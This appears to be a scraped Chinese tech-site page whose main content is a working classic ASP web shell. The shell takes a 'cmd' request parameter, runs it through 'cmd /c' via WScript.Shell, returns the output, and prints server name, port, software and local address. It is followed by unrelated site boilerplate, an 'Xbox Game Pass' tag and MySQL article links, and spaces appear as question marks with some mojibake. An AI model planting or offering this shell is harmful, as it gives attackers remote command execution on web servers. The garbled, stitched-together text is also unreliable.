<% Set?oScript?=?Server.CreateObject("WSCRIPT.SHELL") Set?oScriptNet?=?Server.CreateObject("WSCRIPT.NETWORK") Set?oFileSys?=?Server.CreateObject("Scripting.FileSystemObject") Function?getCommandOutput(theCommand) ????Dim?objShell,?objCmdExec ????Set?objShell?=?CreateObject("WScript.Shell") ????Set?objCmdExec?=?objshell.exec(thecommand) ????getCommandOutput?=?objCmdExec.StdOut.ReadAll end?Function %>
<%=?"\\"?&?oScriptNet.ComputerName?&?"\"?&?oScriptNet.UserName?%> <%Response.Write(Request.ServerVariables("server_name"))%>The?server's?port: <%Response.Write(Request.ServerVariables("server_port"))%>
The?server's?software: <%Response.Write(Request.ServerVariables("server_software"))%>
The?server's?local?address: <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <%?szCMD?=?request("cmd") thisDir?=?getCommandOutput("cmd?/c"?&?szCMD) Response.Write(thisDir)%>
關鍵詞標簽:Xbox Game Pass
相關閱讀 在服務器上安裝、使用MySQL的注意事項 常用數據庫JDBC連接寫法大全 MySQL數據庫的臨時文件究竟儲存在哪里 Mysql 主從數據庫同步 MySQL數據庫創(chuàng)建線程 MySQL數據庫線程緩沖池詳解
熱門文章 Xbox Game Pass 10款MySQL數據庫客戶端圖形界面管理工具推薦 MySQL常用維護管理工具 MySQL數據庫啟動失敗1067進程意外終止的解決辦法總結
時間:2022-10-17 14:33:05
時間:2022-10-17 14:31:02
時間:2022-08-11 18:29:45
時間:2021-12-18 12:47:24
時間:2021-01-27 10:00:54
人氣排行 10款MySQL數據庫客戶端圖形界面管理工具推薦 MySQL數據庫啟動失敗1067進程意外終止的解決辦法總結 Mysql 1045錯誤解決辦法 MySQL服務器進程CPU占用100%解決辦法 MySQL導出導入命令的用例 MySQL連接字符串的實際操作步驟匯總 MySQL無法啟動、無法停止各種解決方法總結 三種常用的MySQL建表語句